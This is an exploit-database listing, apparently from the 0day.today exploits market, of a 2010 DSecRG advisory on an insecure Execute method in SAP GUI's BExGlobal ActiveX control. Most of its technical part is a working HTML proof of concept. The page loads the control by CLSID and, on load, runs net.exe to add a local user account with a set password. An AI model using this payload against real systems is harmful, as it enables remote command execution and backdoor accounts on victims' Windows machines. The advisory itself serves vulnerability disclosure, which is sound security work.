[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SAP GUI version 7.00 BExGlobal Active-X unsecure method

Author
Alexey Sintsov
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11443
Category
remote exploits
Date add
25-03-2010
Platform
windows
=======================================================
SAP GUI version 7.00 BExGlobal Active-X unsecure method
=======================================================


Security vulnerability found in SAP GUI 7.10 and BI 7.0 that allows operating system functions to be called remotely.
 
Application: SAP GUI
Versions Affected: SAP GUI (SAP GUI 7.1)
Vendor URL: http://SAP.com
Bugs: Insecure method. Code Execution.
Exploits: YES
Reported: 16.10.2009
Vendor response: 27.10.2009
Date of Public Advisory: 23.03.2010
Author: Alexey Sintsov from DSecRG
 
Description
***********
 
Insecure method was founded in SAPBExCommonResources (class BExGlobal) activeX control component which is a part of SAP GUI.
One of the methods (Execute) can be used to execute files on users system.
 
 
 
Details
*******
 
Attacker can construct html page which call vulnerable function "Execute" from ActiveX Object BExGlobal.
 
 
 
Example (add user 'don_huan' with password 'p4ssW0rd'):
*******
 
 
<html>
<title>*DSecRG* Add user *DSecRG*</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id='DH'></object>
 
<script language='Javascript'>
function init()
{
DH.Execute("net.exe","user don_huan p4ssW0rd /add","d:\\windows\\",1,"",1);
 
}
init();
</script>
DSecRG
</html>



#  0day.today [2024-09-28]  #